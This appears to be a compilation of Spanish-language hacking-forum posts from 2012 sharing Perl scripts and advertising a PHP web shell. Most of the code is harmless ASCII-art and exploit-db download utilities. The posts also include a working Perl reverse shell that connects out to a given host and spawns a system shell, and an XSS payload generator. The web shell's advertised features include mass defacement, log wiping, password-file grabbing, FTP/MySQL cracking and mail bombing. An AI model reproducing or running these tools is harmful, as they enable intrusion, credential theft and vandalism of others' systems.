Opening audio decoder: [ffmpeg] FFmpeg/libavcodec audio decoders
Ogg : bad packet in stream 0
AUDIO: 44100 Hz, 2 ch, s16le, 64.0 kbit/4.54% (ratio: 8000->176400)
Selected audio codec: [ffvorbis] afm: ffmpeg (FFmpeg Vorbis decoder)
==========================================================================
AO: [dsound] 44100Hz 2ch s16le (2 bytes per sample)
Video: no video
Starting playback...


Bue , no toleraba ver el codigo de mi poisonshell sin identar asi que idente el codigo y le arregle otros errores pero ninguna opcion nueva que comentar xDDD.

Las opciones desde siempre.

-- == Funciones == --

• Informacion : sobre el servidor web
  
  
• Navegacion de archivos y directorios :
  
  * En esta opcion pueden editar , borrar ,renombrar y descargar archivos
  * Tambien podes crear directorios nuevos
  
  
• Ejecutar comandos
  
  
• Subir archivos a un directorio especifico
  
  
• Base64 encode() decode()
  
  
• Ejecutar codigo php con eval()
  
  
• Cargar phpinfo()
  
  
• Crackear hash md5 con salto o sin salto
  
  
• BackShell : en esta version solo esta un reverse shell en perl hecho por mi
  
  
• MassDefacement : masivo deface a un directorio y todos sus subdirectorios que le sigan
  
  
• CleanLogs : limpia logs de linux
  
  
• Deteccion de archivo /etc/passwd o SAM para descargar
  
  
• Cracker para FTP Y Mysql
  
  
• PortScanner
  
  
• MailBomber para varios emails
  
  
• Posibilidad de buscar kernel en DB Exploit
  
  
• ProxyWeb
  
  
• Encode para md5,sha1,crc32
  
  
• FTP
  
  * Crear directorios nuevos
  * Este cliente FTP permite navegar a traves de los directorios y archivos
  * Borrar archivos
  * Cambiar permisos de archivos
  * Descargar archivos
  
  
• SQL Manager
  
  * Podes navegar a traves de la base datos podiendo ver todas
  las bases de datos y tablas activas
  * Ejecutar sentencias SQL
  * Descargar tablas
  * Descargar bases de datos
  
  
• Cookies Manager
  
  * En esta opcion podemos ver todos los cookies activos
  * Podemos crear un cookie con el valor que queremos
  
  
• Session Manager
  
  * En esta opcion podemos ver todas las sesiones activas
  * Podemos crear una sesion con el valor que queremos
  
  
• Shell Protegida con user y pass
  
  
• Autodestruccion de la shell
  
  -- == --
  
  El codigo esta aca
  
  
  Código [Seleccionar] Expandir
  
http://pastebin.com/N03AJbm3

  
  Una imagen
  
  
  

Cortisimo pero util script xDD.

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#XSS Generator 0.2
#Coded By Doddy H

head();

print "\n[+] Enter the code : ";
$code = <STDIN>;
chomp $code;
if ( $code ne "" ) {
    print "\n\n[XSS] : <script>var code =String.fromCharCode("
      . encode($code)
      . "); document.write(code);</script>\n";
}

copyright();

sub head {
    print "\n\n-- == XSS Generator 0.2 == --\n\n";
}

sub copyright {
    print "\n\n-- == (C) Doddy Hackman 2012 == --\n\n";
    <stdin>;
    exit(1);
}

sub encode {
    return join ',', unpack "U*", $_[0];
}

#The End ?


Version mejorada de este script.

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Reverse Shell 0.2
#Coded By Doddy H
#Command : nc -lvvp 666

use IO::Socket;

print "\n== -- Reverse Shell 0.2 - Doddy H 2012 -- ==\n\n";

unless ( @ARGV == 2 ) {
    print "[Sintax] : $0 <host> <port>\n\n";
    exit(1);
}
else {
    print "[+] Starting the connection\n";
    print "[+] Enter in the system\n";
    print "[+] Enjoy !!!\n\n";
    conectar( $ARGV[0], $ARGV[1] );
    tipo();
}

sub conectar {
    socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp') );
    connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
    open( STDIN,  ">&REVERSE" );
    open( STDOUT, ">&REVERSE" );
    open( STDERR, ">&REVERSE" );
}

sub tipo {
    print "\n[+] Reverse Shell Starting...\n\n";
    if ( $^O =~ /Win32/ig ) {
        infowin();
        system("cmd.exe");
    }
    else {
        infolinux();
        system("export TERM=xterm;exec sh -i");
    }
}

sub infowin {
    print "[+] Domain Name : " . Win32::DomainName() . "\n";
    print "[+] OS Version : " . Win32::GetOSName() . "\n";
    print "[+] Username : " . Win32::LoginName() . "\n\n\n";
}

sub infolinux {
    print "[+] System information\n\n";
    system("uname -a");
    print "\n\n";
}

#The End ?


Version Tk de esta nueva version de este script para hacer ascii art desde una palabra.

Una imagen

El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#ASCII Art 0.2
#Version Tk
#Coded By Doddy H
#
#http://search.cpan.org/~lory/Text-Banner-1.00/Banner.pm
#

use Tk;
use Tk::Dialog;
use Text::Banner;

#if ( $^O eq 'MSWin32' ) {
#use Win32::Console;
#Win32::Console::Free();
#}

my $color_fondo = "black";
my $color_texto = "green";

my $ven =
  MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$ven->title("ASCII Art 0.2 || Written By Doddy H");
$ven->geometry("555x305+20+20");
$ven->resizable( 0, 0 );

my $start = Text::Banner->new;

$menula = $ven->Frame(
    -relief     => "sunken",
    -bd         => 1,
    -background => $color_fondo,
    -foreground => $color_texto
);
my $menulnowaxm = $menula->Menubutton(
    -text             => "Options",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $aboutnowaxm = $menula->Menubutton(
    -text             => "About",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $exitnowaxm = $menula->Menubutton(
    -text             => "Exit",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
$menula->pack( -side => "top", -fill => "x" );

$menulnowaxm->command(
    -label      => "Scan",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&now
);

$aboutnowaxm->command(
    -label      => "About",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&about
);

$exitnowaxm->command(
    -label      => "Exit",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&exitnow
);

my $fondo = $ven->Text(
    -width      => 75,
    -heigh      => 15,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 12, -y => 40 );
$ven->Label(
    -text       => "Text : ",
    -font       => "Impact1",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 265 );
my $tengo = $ven->Entry(
    -width      => 40,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 66, -y => 269 );

$ven->Label(
    -text       => "Fill : ",
    -font       => "Impact1",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 340, -y => 265 );
my $fi = $ven->Entry(
    -width      => 5,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 375, -y => 269 );

MainLoop;

sub about {
    $ven->Dialog(
        -title            => "About",
        -buttons          => ["OK"],
        -text             => "Coded By Doddy H",
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->Show();
}

sub exitnow {
    exit(1);
}

sub artnow {

    $start->set( $tengo->get );
    $start->fill( $fi->get );

    return $start->get;

}

sub now {

    $fondo->delete( "0.1", "end" );

    my $now  = $tengo->get;
    my $code = artnow($now);

    $fondo->insert( "end", $code );

}

#The End ?


Una posible version mejorada de este script para hacer ascii art desde una palabra.

El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#ASCII Art 0.2
#Coded By Doddy H
#
#http://search.cpan.org/~lory/Text-Banner-1.00/Banner.pm
#

use Text::Banner;
use Time::HiRes "usleep";

my $start = Text::Banner->new;

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#            ASCII Art 0.2                    #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";
    marquesina(@logo);

}

head();

print "\n\n[+] Text : ";
chomp( my $text = <stdin> );

print "\n\n[+] Fill : ";
chomp( my $fill = <stdin> );

print "\n\n\n" . artnow( $text, $fill ) . "\n";

copyright();

sub artnow {

    $start->set( $_[0] );
    $start->fill( $_[1] );

    return $start->get;

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub copyright {

    print "\n\n";

    marquesina("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";

    <stdin>;
    exit(1);
}

#The End ?


Un ejemplo de uso

Código [Seleccionar] Expandir




r00t ~ # art2.pl



#=============================================#
#            ASCII Art 0.2                    #
#---------------------------------------------#
# Written By Doddy H                          #
# Email: lepuke[at]hotmail[com]               #
# Website: doddyhackman.webcindario.com       #
#---------------------------------------------#
# The End ?                                   #
#=============================================#


[+] Text : hacked


[+] Fill : #




#    #    ##     ####   #    #  ######  #####
#    #   #  #   #    #  #   #   #       #    #
######  #    #  #       ####    #####   #    #
#    #  ######  #       #  #    #       #    #
#    #  #    #  #    #  #   #   #       #    #
#    #  #    #   ####   #    #  ######  #####




-- == (C) Doddy Hackman 2012 == --



Version Tk de este simple script para hacer ASCII Art desde una palabra.

El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#ASCII Art 0.1
#Version Tk
#Coded By Doddy H
#Thanks to : reLlene,MARKO,explorer

use Tk;
use Tk::Dialog;
use List::Util "max";

if ( $^O eq 'MSWin32' ) {
    use Win32::Console;
    Win32::Console::Free();
}

my %letras = (

    a => "         
   @   
   @   
  @ @ 
  @ @ 
@   @
@   @
@@@@@
@     @
@     @
",

    b => "
@@@@
@   @
@   @
@   @
@@@@
@   @
@   @
@   @
@@@@
",

    c => "
  @@@@
@    @
@     
@     
@     
@     
@     
@    @
  @@@@
",

    d => "
@@@@ 
@   @
@    @
@    @
@    @
@    @
@    @
@   @
@@@@ 
",

    e => "
@@@@@
@   
@   
@   
@@@@
@   
@   
@   
@@@@@
",
    f => "
@@@@@
@   
@   
@   
@@@@
@   
@   
@   
@   
",
    g => "
  @@@@
@    @
@     
@     
@  @@@
@    @
@    @
@   @@
  @@@ @
",
    h => "
@    @
@    @
@    @
@    @
@@@@@@
@    @
@    @
@    @
@    @
",
    i => "
@
@
@
@
@
@
@
@
@
",
    j => "
   @
   @
   @
   @
   @
   @
@  @
@  @
@@
",
    k => "
@   @
@  @ 
@ @   
@@   
@@   
@ @   
@  @ 
@   @
@    @
",
    l => "
@   
@   
@   
@   
@   
@   
@   
@   
@@@@@
",
    m => "
@     @
@     @
@@   @@
@@   @@
@ @ @ @
@ @ @ @
@  @  @
@  @  @
@     @
",
    n => "
@    @
@@   @
@@   @
@ @  @
@ @  @
@  @ @
@   @@
@   @@
@    @
",
    o => "
  @@@@
@    @
@    @
@    @
@    @
@    @
@    @
@    @
  @@@@
",
    p => "
@@@@@
@    @
@    @
@    @
@@@@@
@     
@     
@     
@     
",
    q => "
  @@@@
@    @
@    @
@    @
@    @
@    @
@  @ @
@   @@
  @@@@
      @
",
    r => "
@@@@@
@    @
@    @
@    @
@@@@@
@    @
@    @
@    @
@    @
",
    s => "
  @@@
@   @
@   
@   
  @@@
     @
     @
@   @
  @@@
",
    t => "
@@@@@
   @ 
   @ 
   @ 
   @ 
   @ 
   @ 
   @ 
   @ 
",
    u => "
@    @
@    @
@    @
@    @
@    @
@    @
@    @
@    @
  @@@@
",
    v => "
@     @
@     @
@   @
@   @
@   @
  @ @ 
  @ @ 
   @   
   @   
",
    W => "
@         @
@         @
@   @   @
@   @   @
@   @   @
  @ @ @ @ 
  @ @ @ @ 
   @   @   
   @   @   
",
    x => "
@     @
@     @
@   @
  @ @ 
   @   
  @ @ 
@   @
@     @
@     @
",
    y => "
@     @
@     @
@   @
  @ @ 
   @   
   @   
   @   
   @   
   @   
",
    z => "
@@@@@@@
      @
     @
    @ 
   @   
  @   
@     
@     
@@@@@@@
"

);

my $color_fondo = "black";
my $color_texto = "green";

my $ven =
  MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$ven->title("ASCII Art 0.1 || Written By Doddy H");
$ven->geometry("555x300+20+20");
$ven->resizable( 0, 0 );

my $fondo = $ven->Text(
    -width      => 75,
    -heigh      => 15,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 15, -y => 10 );
$ven->Label(
    -text       => "Text : ",
    -font       => "Impact1",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 250 );
my $tengo = $ven->Entry(
    -width      => 40,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 66, -y => 254 );
$ven->Button(
    -command          => \&now,
    -text             => "Now!",
    -width            => 10,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 320, -y => 252 );
$ven->Button(
    -command          => \&about,
    -text             => "About",
    -width            => 10,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 395, -y => 252 );
$ven->Button(
    -command          => \&exitnow,
    -text             => "Exit",
    -width            => 10,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 470, -y => 252 );

MainLoop;

sub about {
    $ven->Dialog(
        -title            => "About",
        -buttons          => ["OK"],
        -text             => "Coded By Doddy H",
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->Show();
}

sub exitnow {
    exit(1);
}

sub now {

    $fondo->delete( "0.1", "end" );

    my $now  = $tengo->get;
    my $code = artnow($now);

    $fondo->insert( "end", $code );

}

sub artnow {

    my $target = shift;

    my $fondo   = " ";
    my $espacio = 0;

    my $lugar;
    my @lotengo;

    my $tipox = $letras{"a"};
    my @lineas = split /\n/, $tipox;
    $altura = @lineas + 1;

    $anchura = max map { length $_ } @lineas;

    for ( 1 .. $altura ) {
        push @lotengo, $fondo x ( ( $anchura + $espacio ) * length $target );
    }

    for my $letra ( split //, $target ) {
        my @lineas = split /\n/, $letras{$letra};

        for my $i ( 0 .. $altura - 1 ) {
            ( my $plan = $lineas[$i] ) =~ s/ /$fondo/g;

            $plan = $fondo x $anchura if not $plan;

            substr( $lotengo[$i], $lugar, length $plan ) = $plan;
        }

        $lugar += $anchura + $espacio;
    }

    return ( join "\n", @lotengo );

}

#The End ?


Una imagen

Sin mucho que decir dejo este simple script para hacer ascii art desde una palabra.

El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#ASCII Art 0.1
#Coded By Doddy H

use List::Util "max";
use Time::HiRes "usleep";

my %letras = (

    a => "         
   @   
   @   
  @ @ 
  @ @ 
@   @
@   @
@@@@@
@     @
@     @
",

    b => "
@@@@
@   @
@   @
@   @
@@@@
@   @
@   @
@   @
@@@@
",

    c => "
  @@@@
@    @
@     
@     
@     
@     
@     
@    @
  @@@@
",

    d => "
@@@@ 
@   @
@    @
@    @
@    @
@    @
@    @
@   @
@@@@ 
",

    e => "
@@@@@
@   
@   
@   
@@@@
@   
@   
@   
@@@@@
",
    f => "
@@@@@
@   
@   
@   
@@@@
@   
@   
@   
@   
",
    g => "
  @@@@
@    @
@     
@     
@  @@@
@    @
@    @
@   @@
  @@@ @
",
    h => "
@    @
@    @
@    @
@    @
@@@@@@
@    @
@    @
@    @
@    @
",
    i => "
@
@
@
@
@
@
@
@
@
",
    j => "
   @
   @
   @
   @
   @
   @
@  @
@  @
@@
",
    k => "
@   @
@  @ 
@ @   
@@   
@@   
@ @   
@  @ 
@   @
@    @
",
    l => "
@   
@   
@   
@   
@   
@   
@   
@   
@@@@@
",
    m => "
@     @
@     @
@@   @@
@@   @@
@ @ @ @
@ @ @ @
@  @  @
@  @  @
@     @
",
    n => "
@    @
@@   @
@@   @
@ @  @
@ @  @
@  @ @
@   @@
@   @@
@    @
",
    o => "
  @@@@
@    @
@    @
@    @
@    @
@    @
@    @
@    @
  @@@@
",
    p => "
@@@@@
@    @
@    @
@    @
@@@@@
@     
@     
@     
@     
",
    q => "
  @@@@
@    @
@    @
@    @
@    @
@    @
@  @ @
@   @@
  @@@@
      @
",
    r => "
@@@@@
@    @
@    @
@    @
@@@@@
@    @
@    @
@    @
@    @
",
    s => "
  @@@
@   @
@   
@   
  @@@
     @
     @
@   @
  @@@
",
    t => "
@@@@@
   @ 
   @ 
   @ 
   @ 
   @ 
   @ 
   @ 
   @ 
",
    u => "
@    @
@    @
@    @
@    @
@    @
@    @
@    @
@    @
  @@@@
",
    v => "
@     @
@     @
@   @
@   @
@   @
  @ @ 
  @ @ 
   @   
   @   
",
    W => "
@         @
@         @
@   @   @
@   @   @
@   @   @
  @ @ @ @ 
  @ @ @ @ 
   @   @   
   @   @   
",
    x => "
@     @
@     @
@   @
  @ @ 
   @   
  @ @ 
@   @
@     @
@     @
",
    y => "
@     @
@     @
@   @
  @ @ 
   @   
   @   
   @   
   @   
   @   
",
    z => "
@@@@@@@
      @
     @
    @ 
   @   
  @   
@     
@     
@@@@@@@
"

);

head();

print "\n\n[+] Text : ";
chomp( my $text = <stdin> );

print "\n\n" . artnow($text) . "\n";

copyright();

sub artnow {

    my $target = shift;

    my $fondo   = " ";
    my $espacio = 0;

    my $lugar;
    my @lotengo;

    my $tipox = $letras{"a"};
    my @lineas = split /\n/, $tipox;
    $altura = @lineas + 1;

    $anchura = max map { length $_ } @lineas;

    for ( 1 .. $altura ) {
        push @lotengo, $fondo x ( ( $anchura + $espacio ) * length $target );
    }

    for my $letra ( split //, $target ) {
        my @lineas = split /\n/, $letras{$letra};

        for my $i ( 0 .. $altura - 1 ) {
            ( my $plan = $lineas[$i] ) =~ s/ /$fondo/g;

            $plan = $fondo x $anchura if not $plan;

            substr( $lotengo[$i], $lugar, length $plan ) = $plan;
        }

        $lugar += $anchura + $espacio;
    }

    return ( join "\n", @lotengo );

}

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#            ASCII Art 0.1                    #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# Thanks to : reLlene,MARKO,explorer          #", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";
    marquesina(@logo);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub copyright {

    print "\n\n";

    marquesina("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";

    <stdin>;
    exit(1);
}

#The End ?


Ejemplo de uso

Código [Seleccionar] Expandir



r00t ~ # art.pl



#=============================================#
#            ASCII Art 0.1                    #
#---------------------------------------------#
# Written By Doddy H                          #
# Email: lepuke[at]hotmail[com]               #
# Website: doddyhackman.webcindario.com       #
#---------------------------------------------#
# Thanks to : reLlene,MARKO,explorer          #
# The End ?                                   #
#=============================================#


[+] Text : kacked



@   @      @       @@@@    @   @    @@@@@    @@@@
@  @       @      @    @   @  @     @        @   @
@ @       @ @     @        @ @      @        @    @
@@        @ @     @        @@       @        @    @
@@       @   @    @        @@       @@@@     @    @
@ @      @   @    @        @ @      @        @    @
@  @     @@@@@    @        @  @     @        @    @
@   @   @     @   @    @   @   @    @        @   @
@    @  @     @    @@@@    @    @   @@@@@    @@@@



-- == (C) Doddy Hackman 2012 == --



Version Tk de esta tool para bajar exploits desde exploit-db

Una imagen



El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Exploit DB Helper 0.5
#Version Tk
#Coded By Doddy H

use Tk;
use Tk::Dialog;
use LWP::UserAgent;
use Cwd;

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);

#if ($^O eq 'MSWin32') {
#use Win32::Console;
#Win32::Console::Free();
#}

my $color_texto = "yellow";
my $color_fondo = "black";

my $newdaxz =
  MainWindow->new( -background => $color_fondo, -foreground => $color_texto );

$newdaxz->title("Exploit DB Helper 0.5");
$newdaxz->geometry("345x350+50+50");
$newdaxz->resizable( 0, 0 );

$menula = $newdaxz->Frame(
    -relief     => "sunken",
    -bd         => 1,
    -background => $color_fondo,
    -foreground => $color_texto
);
my $menulnowaxm = $menula->Menubutton(
    -text             => "Options",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $aboutnowaxm = $menula->Menubutton(
    -text             => "About",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $exitnowaxm = $menula->Menubutton(
    -text             => "Exit",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
$menula->pack( -side => "top", -fill => "x" );

$menulnowaxm->command(
    -label      => "Find",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&findnow
);
$menulnowaxm->command(
    -label      => "Logs",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&openlogs
);

$aboutnowaxm->command(
    -label      => "About",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&aboutxa
);

$exitnowaxm->command(
    -label      => "Exit",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&exitnow
);

$newdaxz->Label(
    -text       => "String : ",
    -font       => "Impact",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 40 );
my $string = $newdaxz->Entry(
    -width      => 40,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 75, -y => 45 );

$newdaxz->Label(
    -text       => "Exploits Found",
    -font       => "Impact",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 120, -y => 80 );
my $exploits = $newdaxz->Listbox(
    -width      => 40,
    -height     => 10,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 50, -y => 130 );

$newdaxz->Label(
    -text       => "Status : ",
    -font       => "Impact",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 63, -y => 300 );
my $tatus = $newdaxz->Entry(
    -width      => 25,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 120, -y => 305 );

MainLoop;

sub openlogs {
    my $cosa = $string->get;
    if ( -d $cosa ) {
        system("start $cosa");
    }
    else {
        $newdaxz->Dialog(
            -title            => "Error",
            -buttons          => ["OK"],
            -text             => "Error",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -activebackground => $color_texto
        )->Show();
    }
}

sub findnow {
    $exploits->delete( "0.0", "end" );
    my $cosa = $string->get;
    $tatus->configure( -text => "Searching ..." );
    my %found = buscar($cosa);
    $total = int( keys %found ) - 1;
    $tatus->configure( -text => "$total exploits found" );
    unless ( -d $cosa ) {
        mkdir( $cosa, "777" );
    }
    $tatus->configure( -text => "Downloading exploits ..." );
    for my $da ( keys %found ) {
        my $tata = $da;
        $tata =~ s/\<//;
        $tata =~ s/(\s)+$//;
        if ( download( $found{$da}, $cosa . "/" . $tata . ".txt" ) ) {
            $newdaxz->update;
            $exploits->insert( "end", $da );
        }
    }
    $tatus->configure( -text => " " );
}

sub buscar {
    for my $n ( 1 .. 666 ) {
        $newdaxz->update;
        my $code =
          toma( "http://www.exploit-db.com/search/?action=search&filter_page="
              . $n
              . "&filter_description="
              . $_[0]
              . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="
          );
        chomp $code;
        if ( $code =~ /No results/ig ) {
            return %busca;
        }
        %busca = getlinks($code);
    }
}

sub getlinks {

    my $test = HTML::Parser->new(
        start_h => [ \&start, "tagname,attr" ],
        text_h  => [ \&text,  "dtext" ],
    );
    $test->parse( $_[0] );

    sub start {
        my ( $a, $b ) = @_;
        my %e = %$b;
        unless ( $a ne "a" ) {
            $d = $e{href};
            $c = $a;
        }
    }

    sub text {
        my $title = shift;
        chomp $title;
        unless ( $c ne "a" ) {
            if ( $d =~ /www.exploit-db.com\/exploits\/(.*)/ ) {
                my $id  = $1;
                my $url = "http://www.exploit-db.com/download/" . $id;
                $links{$title} = $url;
            }
            $d = "";
        }
    }
    return %links;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}

sub download {
    if ( $nave->mirror( $_[0], $_[1] ) ) {
        if ( -f $_[1] ) {
            return true;
        }
    }
}

sub aboutxa {
    $newdaxz->Dialog(
        -title            => "About",
        -buttons          => ["OK"],
        -text             => "Coded By Doddy H",
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->Show();
}

sub exitnow {
    exit 1;
}

#The End ?


Version mejorada de este script para buscar exploits en la pagina exploit-db

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Exploit DB Helper 0.5
#Coded By Doddy H

use LWP::UserAgent;
use HTML::Parser;
use Data::Dumper;
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

head();
print "\n\n[String] : ";
chomp( my $cosa = <stdin> );
if ( $cosa eq "" ) { menu(); }
print "\n\n[+] Searching ...\n\n";
my %found = buscar($cosa);
$total = int( keys %found ) - 1;
print "[+] Exploits Found : " . $total . "\n\n";

unless ( -d $cosa ) {
    mkdir( $cosa, "777" );
}
for my $da ( keys %found ) {
    my $tata = $da;
    $tata =~ s/\<//;
    $tata =~ s/(\s)+$//;
    if ( download( $found{$da}, $cosa . "/" . $tata . ".txt" ) ) {
        print "[Exploit Found] : " . $da . "\n";
    }
}
copyright();

sub buscar {
    for my $n ( 1 .. 666 ) {
        my $code =
          toma( "http://www.exploit-db.com/search/?action=search&filter_page="
              . $n
              . "&filter_description="
              . $_[0]
              . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="
          );
        chomp $code;
        if ( $code =~ /No results/ig ) {
            return %busca;
        }
        %busca = getlinks($code);
    }
}

sub getlinks {

    my $test = HTML::Parser->new(
        start_h => [ \&start, "tagname,attr" ],
        text_h  => [ \&text,  "dtext" ],
    );
    $test->parse( $_[0] );

    sub start {
        my ( $a, $b ) = @_;
        my %e = %$b;
        unless ( $a ne "a" ) {
            $d = $e{href};
            $c = $a;
        }
    }

    sub text {
        my $title = shift;
        chomp $title;
        unless ( $c ne "a" ) {
            if ( $d =~ /www.exploit-db.com\/exploits\/(.*)/ ) {
                my $id  = $1;
                my $url = "http://www.exploit-db.com/download/" . $id;
                $links{$title} = $url;
            }
            $d = "";
        }
    }
    return %links;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}

sub download {
    if ( $nave->mirror( $_[0], $_[1] ) ) {
        if ( -f $_[1] ) {
            return true;
        }
    }
}

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#            Exploit DB 0.5                   #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";
    marquesina(@logo);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub copyright {

    print "\n\n";

    marquesina("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";

    <stdin>;
    exit(1);
}

#The End ?


Desde que vi por primera vez este exploit en ruby siempre quise lograr el mismo efecto en perl , con la ayuda de explorer de perlenespanol logre hacer una funcion en perl que hace lo mismo que el exploit que mencione.

El codigo con un ejemplo de uso incluido

Código (perl) [Seleccionar] Expandir


#!/usr/bin/perl
#Funcion marquesina()
#Coded By Doddy H

use Time::HiRes "usleep";

my @test = ("testando ahora now");

sub marquesina {

#Effect based in the exploits by Jafer Al Zidjali

my @logo = @_;

my $car = "|";

for my $uno(@logo) {
for my $dos(split //,$uno) {

$|++;

if($car eq "|") {
mostrar("\b".$dos.$car,"/");
}
